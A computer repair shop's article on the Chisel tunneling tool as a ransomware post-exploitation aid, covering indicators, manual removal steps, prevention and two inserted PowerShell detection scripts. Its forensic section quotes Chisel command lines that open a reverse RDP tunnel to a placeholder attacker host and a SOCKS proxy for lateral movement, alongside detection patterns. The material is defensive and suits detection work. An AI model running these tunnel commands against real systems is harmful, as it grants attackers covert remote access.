Chisel is an open-source networking tool designed for legitimate system administration and penetration testing, but it has been weaponized by ransomware gangs and advanced persistent threat groups to tunnel malicious traffic through firewalls and maintain covert backdoor access. Originally created by developer Jaime Pillora as a TCP/UDP-over-HTTP tunneling utility, Chisel's flexibility and cross-platform nature make it attractive to attackers who need to bypass network security controls without writing custom malware. When found running on systems without administrator knowledge, it typically indicates an active intrusion where attackers are moving laterally through your network or maintaining persistent remote access.

If you suspect Chisel is running on your computer right now: Disconnect from the internet immediately (unplug ethernet or disable Wi-Fi). Do not attempt to use the machine for banking, email, or other sensitive activities. Call Computer Repair Roswell at (770) 667-9098 or bring the system to our shop at 1235 Hembree Road. Active tunneling tools mean an attacker may have real-time access to your files and keystrokes.

Threat Profile

Attribute | Details
Canonical Name | Chisel
Malware Classification | Post-exploitation tool / Network tunneling utility
Platform | Windows (also available for Linux, macOS, FreeBSD)
File Type | Windows PE executable (compiled Go binary)
Typical File Size | 7–10 MB (varies by version and compression)
Primary Use by Threat Actors | Persistence, command-and-control tunneling, lateral movement
First Observed in Wild (Legitimate Release) | 2015 (weaponized observations from 2019 onward)
Known Ransomware Associations | PYSA (Mespinoza), Conti, BlackCat/ALPHV, LockBit
Distribution Method | Dropped by other malware, manual attacker deployment
Detection Names (AV Engines) | HackTool:Win64/Chisel, PUA:Win32/Chisel, Tool.Chisel
Legitimate Use Cases | Penetration testing, remote support, SSH tunneling replacement
Malpedia Last Updated | 2026-06-09

How It Spreads

Unlike traditional malware that spreads through phishing emails or exploit kits, Chisel almost never arrives on its own. It is a second-stage tool deployed after an attacker has already compromised your system through other means. In most cases, threat actors gain initial access via phishing, stolen credentials, unpatched vulnerabilities in internet-facing services, or trojanized software downloads. Once they have a foothold, they use remote desktop protocols, stolen admin credentials, or other backdoors to manually upload and execute Chisel.

The tool's legitimate origins make it invisible to many security controls—antivirus engines often classify it as a "potentially unwanted application" or "hacktool" rather than outright malware, and some enterprise environments even whitelist it if penetration testers use it during authorized assessments. Attackers exploit this ambiguity, sometimes renaming the executable to mimic legitimate system files (svchost.exe, csrss.exe, or Windows utility names) to avoid drawing attention during casual inspection.

Common infection chains that lead to Chisel deployment include:

  • Ransomware campaigns: Groups like PYSA and Conti drop Chisel to maintain access even after initial payloads are detected, allowing them to re-enter the network if defenders remove the primary ransomware binary.
  • Business email compromise (BEC): Attackers with stolen Office 365 credentials use Chisel to tunnel into internal networks from the public internet, bypassing firewall rules.
  • Supply chain attacks: Compromised managed service provider (MSP) tools or remote monitoring software can be used to push Chisel to dozens or hundreds of endpoints simultaneously.
  • Living-off-the-land tradecraft: Advanced attackers pair Chisel with PowerShell or other built-in Windows tools to create multi-hop proxy chains that obscure the true command-and-control server location.
  • Insider threats: Disgruntled employees or contractors with legitimate network access may install Chisel to exfiltrate data over encrypted tunnels that evade data loss prevention systems.

What It Does On Your Machine

Chisel operates as both a client and server, creating encrypted tunnels that forward network traffic through HTTP or HTTPS connections. When attackers deploy it on a compromised Windows machine, they typically run it in client mode, connecting back to a Chisel server they control on the public internet or on another compromised host within your network. This tunnel allows them to route commands, file transfers, and remote desktop sessions through your machine as if they were sitting at the keyboard, all while appearing to network monitoring tools as ordinary web traffic.

The tool requires minimal configuration—a single command-line invocation can establish a persistent tunnel. Once running, Chisel consumes modest system resources but maintains an open connection that attackers use for reconnaissance, data theft, privilege escalation, and lateral movement. Because the traffic is encapsulated in HTTP/HTTPS, traditional firewall rules that block unusual protocols or ports are ineffective. The connection often appears as outbound web traffic to legitimate-looking domains (attackers sometimes use cloud hosting providers or compromised web servers as relay points).

In PYSA ransomware incidents specifically, researchers observed Chisel being used to maintain access during the multi-day reconnaissance phase before encryption. Attackers would tunnel RDP sessions through Chisel, allowing them to manually explore file shares, identify backup systems, and locate high-value data for exfiltration—all while security teams remained unaware of the intrusion. The tool's logging is minimal by default, leaving few forensic traces beyond process execution and network connection records.

Typical Chisel Deployment Artifacts (observed in sandbox and incident reports):

  C:\Users\[username]\AppData\Local\Temp\chisel.exe   // Common staging location
  C:\Windows\System32\svchost.exe (renamed Chisel binary)
  C:\ProgramData\SystemData\chisel_client.exe

Command-line patterns (from forensic analysis):

  chisel.exe client --keepalive 30s --max-retry-count -1 https://[attacker-IP]:8443 R:3389:127.0.0.1:3389   // Reverse tunnel for RDP
  chisel.exe client http://192.168.1.50:9000 socks   // SOCKS proxy for lateral movement

Network indicators (connection patterns):

  Outbound HTTPS to cloud providers (AWS, Azure, DigitalOcean) on non-standard ports (8443, 8080, 9443)
  Long-duration TCP connections with periodic keepalive traffic
  HTTP User-Agent: Go-http-client/1.1   // Default for Go-based tools

Process characteristics:

  Parent process: cmd.exe, powershell.exe, or scheduled task (SYSTEM account)
  No GUI window; runs as console application or background service
  May be configured as Windows service with auto-start
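The artifacts above can be checked on a live host with the following triage script, added here as an example (it is not part of the original article or of the Chisel project). It assumes an elevated PowerShell prompt on Windows 8 / Server 2012 or later (for Get-NetTCPConnection) and only reports; it does not terminate or delete anything.

```powershell
# Added triage script: correlate running processes with their established TCP
# connections and flag the Chisel indicators described in the article.
$SuspectPorts = 8443, 8080, 9443, 9000
# Chisel client syntax seen in incidents: "client <url> R:<port>:<host>:<port>" or "client <url> socks"
$CmdPattern   = '\bclient\b\s.*https?://\S+\s+(R:\d+:|\d+:\S+|socks)'
$StagingPaths = '\\AppData\\Local\\Temp\\|\\ProgramData\\|\\Windows\\Temp\\'

$procs = Get-CimInstance -ClassName Win32_Process
$conns = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue

$findings = foreach ($p in $procs) {
    $reasons = @()
    if ($p.Name -match '^chisel')                               { $reasons += 'process name' }
    if ($p.CommandLine -match $CmdPattern)                      { $reasons += 'chisel-style client arguments' }
    if ($p.CommandLine -match '--keepalive|--max-retry-count')  { $reasons += 'chisel keepalive/retry flags' }
    if ($p.ExecutablePath -match $StagingPaths)                 { $reasons += 'running from staging directory' }

    # Outbound connections owned by this process to the non-standard ports named above
    $remotePorts = ($conns | Where-Object { $_.OwningProcess -eq $p.ProcessId -and $_.RemotePort -in $SuspectPorts }).RemotePort
    if ($remotePorts) { $reasons += "established connection to port $(($remotePorts | Sort-Object -Unique) -join ',')" }

    # A renamed Chisel binary is a 7-10 MB unsigned Go executable; a genuine svchost.exe or csrss.exe is Microsoft-signed
    if ($p.ExecutablePath -and (Test-Path -LiteralPath $p.ExecutablePath)) {
        $sizeMB = [math]::Round((Get-Item -LiteralPath $p.ExecutablePath).Length / 1MB, 1)
        $sig    = Get-AuthenticodeSignature -FilePath $p.ExecutablePath
        if ($sig.Status -ne 'Valid' -and $sizeMB -ge 7 -and $sizeMB -le 10) { $reasons += "unsigned $sizeMB MB binary" }
        if (($p.Name -in 'svchost.exe', 'csrss.exe') -and $sig.Status -ne 'Valid') { $reasons += 'system process name with invalid signature' }
    }

    if ($reasons.Count -gt 0) {
        $parent = ($procs | Where-Object ProcessId -eq $p.ParentProcessId).Name
        [pscustomobject]@{
            PID     = $p.ProcessId
            Name    = $p.Name
            Parent  = $parent            # cmd.exe / powershell.exe parents are typical for manual deployment
            Path    = $p.ExecutablePath
            Reasons = $reasons -join '; '
        }
    }
}

if ($findings) { $findings | Format-List } else { 'No Chisel-like processes found.' }
```

Record the PID, path and command line of every hit (a screenshot or a saved copy of this output) before proceeding to termination, since those details feed the persistence checks later in the removal steps.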

The tool's stealthy nature means many victims never realize they've been compromised until ransomware deploys or suspicious bank transactions appear. By the time Chisel is discovered, attackers have often had unfettered network access for days or weeks.

Manual Removal — Step by Step

01

Isolate the System

Disconnect from all networks immediately—unplug ethernet cables and disable Wi-Fi. Do not shut down the computer yet (this preserves memory for forensics). If this is a work machine, notify your IT department or security team before proceeding. For home users, keep the system isolated until the removal process is complete.

02

Document Running Processes

Open Task Manager (Ctrl+Shift+Esc). Switch to the Details tab and look for unfamiliar processes, especially those named "chisel.exe" or Go-compiled binaries (7–10 MB in size, often running under SYSTEM or your user account). Take screenshots. Right-click suspicious processes and select "Open file location" to identify the executable path before terminating.

03

Terminate Chisel Processes

In Task Manager, select the chisel.exe process (or renamed variants) and click "End Task." If the process immediately respawns, it's being launched by a scheduled task or service. Note the process ID and command-line arguments if visible. You may need to open Command Prompt as Administrator and use taskkill /F /IM chisel.exe to force termination.

04

Check Scheduled Tasks and Services

Open Task Scheduler (search Start menu) and review the Task Scheduler Library. Look for recently created tasks with unfamiliar names or triggers set to "At system startup" or "At log on." Delete any tasks that reference chisel.exe or suspicious paths. Next, open Services (services.msc) and look for unauthorized services—sort by "Startup Type" to find automatic services you don't recognize.

05

Delete Chisel Executables

Navigate to the file paths identified in Step 2. Common locations include C:\Users\[username]\AppData\Local\Temp\, C:\ProgramData\, and C:\Windows\Temp\. Delete all chisel.exe files and any renamed copies. Check for hidden files (in File Explorer, View tab → Options → Show hidden files). Use Shift+Delete to bypass Recycle Bin.

06

Inspect Registry Startup Entries

Press Win+R, type regedit, and navigate to these keys: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Look for entries pointing to chisel.exe or unknown executables. Right-click and delete suspicious entries. Also check HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services for manually created services.

07

Scan with Multiple Antivirus Engines

Run a full system scan with your installed antivirus. Then download and run secondary scanners like Malwarebytes, HitmanPro, or Microsoft Safety Scanner (all free). Chisel may be flagged as "PUA" (potentially unwanted application) or "HackTool"—remove all detections. Reboot in Safe Mode (hold Shift while clicking Restart, then Troubleshoot → Advanced → Startup Settings → Safe Mode) and scan again.

08

Review User Accounts and Passwords

Open Computer Management (compmgmt.msc) and check Local Users and Groups. Look for unauthorized administrator accounts. If you find any, disable or delete them. Change passwords for all local and domain accounts accessed from this machine, especially administrator accounts. Enable two-factor authentication on all critical accounts (email, banking, work VPN).

09

Check Firewall and Network Settings

Open Windows Defender Firewall with Advanced Security. Review outbound rules for any entries you didn't create, especially those allowing connections on ports 8443, 8080, or 9443. Delete unauthorized rules. Check your network adapter settings (ncpa.cpl) for unusual proxy configurations or static DNS servers—reset to automatic if tampering is suspected.

10

Consider Full System Rebuild

If Chisel was part of a ransomware incident or if you find evidence of additional backdoors, the safest approach is a complete Windows reinstall from trusted media. Attackers who deploy Chisel often leave multiple persistence mechanisms. Back up critical files to an external drive (scan them separately on a clean system before restoring), then wipe and reinstall Windows. Restore files but not applications or system images—reinstall software from official sources only.
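The persistence locations covered in steps 04 and 06 (scheduled tasks, services, and the two Run keys) can be swept in one pass with the script below, added here as an example that is not part of the original article. It assumes an elevated PowerShell prompt on Windows 8 / Server 2012 or later (for Get-ScheduledTask), and it only reports hits for manual review; the ProgramData match in particular can surface legitimate software, so check each entry before deleting it.

```powershell
# Added persistence sweep: report tasks, services and Run-key values that reference
# chisel.exe, the staging directories named in the article, or chisel-style
# reverse-tunnel arguments (R:<port>:<host>:<port>).
$Indicator = 'chisel|\\AppData\\Local\\Temp\\|\\ProgramData\\|\\Windows\\Temp\\|\sR:\d+:\S+:\d+'

function Test-Indicator([string]$Text) {
    return (-not [string]::IsNullOrEmpty($Text)) -and ($Text -match $Indicator)
}

$findings = @()

# Scheduled tasks: inspect the Execute and Arguments of every action of every task
foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        $line = "$($action.Execute) $($action.Arguments)".Trim()
        if (Test-Indicator $line) {
            $findings += [pscustomobject]@{ Source = 'ScheduledTask'; Name = "$($task.TaskPath)$($task.TaskName)"; Detail = $line }
        }
    }
}

# Services: PathName holds the binary path plus any arguments; StartMode shows auto-start
foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if (Test-Indicator $svc.PathName) {
        $findings += [pscustomobject]@{ Source = 'Service'; Name = $svc.Name; Detail = "$($svc.StartMode): $($svc.PathName)" }
    }
}

# Run keys from step 06 (per-machine and per-user)
$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($prop in $props.PSObject.Properties) {
        # Skip the provider metadata that Get-ItemProperty adds to every result
        if ($prop.Name -in 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider') { continue }
        if (Test-Indicator ([string]$prop.Value)) {
            $findings += [pscustomobject]@{ Source = 'RunKey'; Name = "$key\$($prop.Name)"; Detail = $prop.Value }
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize -Wrap } else { 'No Chisel-related persistence entries found.' }
```

If this sweep returns nothing but the process keeps respawning after termination, the launcher is somewhere this script does not cover (for example WMI subscriptions or a second, renamed binary), which is the kind of evidence of additional backdoors that justifies the full rebuild in step 10.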

Prevention

  1. Implement application whitelisting: Use Windows Defender Application Control (WDAC) or third-party solutions to prevent execution of unauthorized executables, especially in Temp folders and user profile directories. This blocks most post-exploitation tools including Chisel.
  2. Monitor outbound network traffic: Deploy endpoint detection and response (EDR) software or configure your firewall to alert on long-duration HTTPS connections to unusual ports (8080, 8443, 9443) or cloud hosting providers. Look for HTTP User-Agent strings associated with automation tools (Go-http-client, curl, python-requests).
  3. Restrict local administrator privileges: Limit the number of accounts with admin rights. Attackers need elevated privileges to install services or modify system directories—standard user accounts significantly reduce the attack surface. Use separate accounts for daily work and administrative tasks.
  4. Enable PowerShell logging and script block monitoring: Many Chisel deployments use PowerShell for download and execution. Configure Windows Event Logging to capture PowerShell commands (Event IDs 4103, 4104) and review logs regularly for suspicious download patterns (Invoke-WebRequest, certutil, bitsadmin).
  5. Patch systems promptly: While Chisel itself doesn't exploit vulnerabilities, attackers gain initial access through unpatched software. Prioritize updates for Windows, web browsers, VPN gateways, and internet-facing applications. Enable automatic updates where feasible.
  6. Train staff on phishing recognition: The majority of intrusions that lead to Chisel deployment start with phishing emails. Conduct regular security awareness training focused on identifying credential harvesting attempts, malicious attachments, and social engineering tactics. Use simulated phishing campaigns to reinforce lessons.
  7. Segment your network: Separate critical systems (file servers, databases, backup infrastructure) from general workstations using VLANs and firewall rules. This limits an attacker's ability to use Chisel for lateral movement even if one endpoint is compromised.
  8. Monitor scheduled tasks and services: Use Group Policy or third-party tools to alert when new scheduled tasks or services are created, especially on non-server systems. Regularly audit these mechanisms for unauthorized persistence—attackers rely on users not checking these locations.

Computer Repair Roswell's 90-Day Warranty: When you bring your infected machine to our shop, we don't just remove Chisel—we investigate the full scope of the compromise, eliminate all persistence mechanisms, and verify your system is clean through multi-engine scanning. If any related malware resurfaces within 90 days of our service, we'll re-clean your system at no additional charge. We stand behind our work because we know how determined these attackers can be.

Bring It In

Chisel infections signal a serious security breach that extends beyond a single piece of malware. If you've discovered this tool on your computer, there's a strong possibility that attackers have accessed your files, stolen credentials, and potentially installed additional backdoors. Our team at Computer Repair Roswell has extensive experience with post-intrusion forensics and remediation—we'll identify how attackers gained access, what they may have taken, and ensure every trace of their presence is eliminated. We work with both home users dealing with personal data theft and small businesses recovering from ransomware incidents.

Located at 1235 Hembree Road in Roswell, we offer same-day diagnostics and transparent pricing with no hidden fees. Call us at (770) 667-9098 to describe your situation, or bring your computer directly to the shop during business hours. We'll explain our findings in plain English, walk you through the evidence we discover, and provide written documentation for insurance claims or law enforcement reports if needed. Don't let attackers maintain access to your digital life—let's shut them out permanently.